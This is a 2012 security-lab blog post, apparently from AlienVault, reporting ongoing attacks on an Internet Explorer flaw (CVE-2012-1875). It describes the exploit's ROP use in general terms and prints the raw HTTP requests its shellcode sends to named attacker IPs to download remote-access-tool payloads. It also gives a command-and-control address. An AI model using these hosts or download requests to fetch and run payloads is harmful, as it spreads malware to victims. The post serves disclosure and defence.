Ongoing attacks exploiting CVE-2012-1875

http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/?utm_source=rss

----------------------------------------------------------------------------------------------------

June 13th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware

Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited as reported by mcafee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

 

The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The shellcode downloads the payload from the following url:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

 

 

 

 

 

A couple of days ago the AV detection rate was 3/41.

 

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /english/cala.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

 

 

 

 

 

 

 

The payloads seems to be RAT (Remote Access Tools).

The C&C server for that RAT is online (ip address 219.90.117.132)

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved on this attack.